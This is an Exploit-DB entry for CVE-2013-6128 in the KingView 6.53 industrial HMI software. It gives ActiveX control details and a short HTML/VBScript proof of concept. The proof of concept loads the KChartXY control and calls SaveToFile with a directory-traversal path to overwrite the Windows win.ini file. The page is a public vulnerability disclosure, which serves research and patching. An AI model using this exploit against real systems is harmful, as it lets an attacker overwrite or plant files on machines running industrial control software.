KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)



EDB-ID: 28085 CVE: 2013-6128 OSVDB-ID: 97014
Author: blake Published: 2013-09-04 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53 
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented

Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>
<script language='vbscript'>

arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"

target.SaveToFile arg1 

</script>